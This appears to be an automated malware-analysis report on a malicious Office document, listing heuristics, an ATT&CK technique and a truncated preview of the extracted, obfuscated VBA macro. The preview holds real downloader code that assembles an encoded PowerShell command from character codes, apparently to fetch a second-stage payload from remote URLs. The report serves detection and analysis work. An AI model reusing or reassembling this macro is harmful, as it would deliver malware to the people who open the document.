MALICIOUS
62
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is an OLE document with a significant amount of slack space and detected VBA macros. The VBA macro attempts to construct a string using character codes, which is a common technique for obfuscating malicious commands or URLs. The constructed string 'HeLL ( [cHA' is likely the beginning of a command or URL used to download and execute a second-stage payload.
Heuristics 3
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 100,864 bytes but its declared streams total only 35,549 bytes — 65,315 bytes (65%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11835 bytes |
SHA-256: f1a3432dbf04ed24f2faedab2f2cb0f5feed5ac0c72ddaa7942f0a3e07aa8b41 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EndRLrICqC" Function boCvXzpW() On Error Resume Next FfbjDv = Tan(3805) Buaas = CDbl(khbiL) qXIhk = Tan(68505) ztIqj = CDbl(fwwuki * CDbl(wsRBSN + Int(IFSiz * Rnd(57503)) * zXTjzU * Log(51840 * mTtUV - wkEJi + Fix(51)))) jzuMGn = ZjDwH JOqGzI = shKUOY VSJpSnzNkz = "HeLL ( [cHA" + "R[]](4 ,73" + " ,104 ,86,116,7" + "3 , 0,29" + " ,0" + " ,78 , 69 ,87 " + ", 13,79,6" + "6,74 ,69 ,67" NzZPl = Tan(96289) fBfLT = CDbl(HRDji) zsWXwj = Tan(20353) XYBzRL = CDbl(mrWra * CDbl(BirlI + Int(tNVtp * Rnd(61021)) * DHjHsn * Log(26504 * BqMzH - MLYth + Fix(51)))) QZLLt = OkoWG NqAnf = AIjCzA lFbYJnqHX = " ," + " 84 ,0 , " + "82,65 " + ", 78 ,68" + " ,7" + "9 ,77,27 " + ",4, 80," + "107 ,68," + " 75,101, " vuLlL = Tan(16881) KIrGM = CDbl(Oquiu) FAOPN = Tan(92305) OdXJsi = CDbl(NfCjdE * CDbl(DYdwjr + Int(SbMAAc * Rnd(59733)) * RLmuJ * Log(72002 * YkSDUv - aUMvjz + Fix(51)))) cApzL = jjwuH YztdcX = mAsoFw MEauIH = "66 ,0 , " + "29, 0 , 78 " + ",69 , " + "87, 13 ,79 ,6" + "6 , 74,69 ,67" + " , 84, 0,115 , " + "89 ," + " 83 ,84, 69, 77" + ", 1" zLKXiw = Tan(79697) vWFdo = CDbl(kAIjAU) EDZCi = Tan(52277) HMXls = CDbl(JBSTlJ * CDbl(KCfWEw + Int(wmQBf * Rnd(29433)) * UQSKFJ * Log(19326 * znmmPf - vIqndb + Fix(51)))) NcbzHm = jadAm DsjRj = WqHLs WiMJCrbEs = "4 ,110,69 ,84," + " 14,119, 69" + " ," + " 6" + "6 ,99, 76, " + "73" + ",69 , 78,84," + "27 ,4 , 73," + "66 , 7" + "9, 86 ,65 , 8" QEMOlD = Tan(50866) kQwLc = CDbl(ifJHO) JchMX = Tan(8205) LLTHT = CDbl(EinKN * CDbl(XkYlXc + Int(lCAaDJ * Rnd(15640)) * hvHBFc * Log(20565 * BudjPi - PGTRDG + Fix(51)))) TDRjIa = pvzKmJ qXrtt = HNlUj NltOwKzLjz = "4, 0, 29 ,0 , 7" + ",72 ,84, 84, " + "80, 26 ,15 ," + " 15 , 8" + "7, " + "87, 87 , 14," + "77, 85 ," EbPmfU = Tan(87172) kGmDUT = CDbl(PkXtJQ) lwJiI = Tan(97616) CqPtR = CDbl(nCQrZQ * CDbl(GGBHwA + Int(NJGIHN * Rnd(27919)) * XAHCX * Log(44855 * NMVUwj - oPIzwY + Fix(51)))) GiQdf = mGFjz plbDIW = qzHQp FjYTcszV = " 83,65 ,83" + ", 72 ,73 , 83 " + ",72 , 73, 78" + ", 74 ,7" + "9 ,13 , 83,72" + " ,73,75 ,65 " + ", 14,67 , 79" boCvXzpW = VSJpSnzNkz + lFbYJnqHX + MEauIH + WiMJCrbEs + NltOwKzLjz + FjYTcszV End Function Function PaPPH() On Error Resume Next mCzTO = Tan(47239) MJXDD = CDbl(bisdJ) MshbC = Tan(76791) ZwMii = CDbl(cXtGfm * CDbl(RsNmDi + Int(TPjCKb * Rnd(92307)) * vLOBd * Log(65888 * qpPoPw - jzDizv + Fix(51)))) cFiRcM = ZflFn oCXXPP = tjkzjd OAbwSjjJw = ", 77 ,15 " + ", 87 ," + " 80" + " ,15,8" + "7 , 80 ," qjSha = Tan(51112) Amswpo = CDbl(Fzwwk) JEHlw = Tan(41965) RoVSM = CDbl(ucbKr * CDbl(CarPK + Int(jBUYs * Rnd(61013)) * CJufda * Log(22431 * tZvzOO - ArBVz + Fix(51)))) TdfrlM = wAHZUB zJAwRw = WBdXWf YCwiwIClPkw = " 13, 67 ,79,78" + ",84, 69,78 " + ",84 ,15, 84 " + ",72 , 69" + " ," + "77" + " ,69,83 ,15, 7" + "3, 75, 116," + " 121, 90, 106,1" + "5 ,96 ,72 ,84" sEnuh = Tan(8290) rzkNJ = CDbl(vwwZBn) CnGosm = Tan(10131) NADKT = CDbl(jOwIV * CDbl(JXQAL + Int(RfFWB * Rnd(37307)) * KWkPBj * Log(38116 * MDsAca - XLdzLZ + Fix(51)))) bHhwHZ = HAuDl TYzicj = usCHX TwiDBwjT = " ,84, " + "80 ,26 , 15," + "15, 17 " + ", 24 " + ",21,14 , " + "18 , 24," TwJMr = Tan(64779) AckYmE = CDbl(RmnUf) sdXwr = Tan(81784) zjPHFP = CDbl(zTzwc * CDbl(wKwpki + Int(GzHii * Rnd(36678)) * jfhLc * Log(94279 * MjhBHb - jiMwna + Fix(51)))) wLtQPQ = cMjZK jbRnc = oXVvi GQsnSvAnHqX = "14 ,18 , 18 " + ", 14 ,17,19" + ", 17," + "15,23" + " ," sroBJP = Tan(70440) tiZNz = CDbl(ZLAXBB) tAaJbA = Tan(27620) HWkRMj = CDbl(kCHfh * CDbl(cuNhQ + Int(YjZzXT * Rnd(40545)) * IkiGd * Log(42625 * nVGWp - vzEwh + Fix(51)))) GMHwd = WJRrY zpYGK = DdjUzq nMSOiB = " 72, 1" + "09 , 1" + "08 , 1" + "10 ," + "84,25,22 , 7" + "0 " bJhbDF = Tan(29323) AsaLb = CDbl(ojvIdY) XVWhkG = Tan(48815) wLCCR = CDbl(LXJNZ * CDbl(DQPdZ + Int(vmpkj * Rnd(53417)) * ldCtk * Log(76016 * Kiiwf - ljEwC + Fix(51)))) MFwtZ = Ajzhwf WMZlR = AiPiqh NhbsvlPFpkj = ", 15,96 ,72 ,8" + "4 , 84" + ",80,26 ," + "15 , 1" + "5,87, 87 ,87 ," EsOwSn = Tan(21880) NbdYPH = CDbl(FXOaK) oolFiR = Tan(36363) IwwTI = CDbl(fkKji * ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.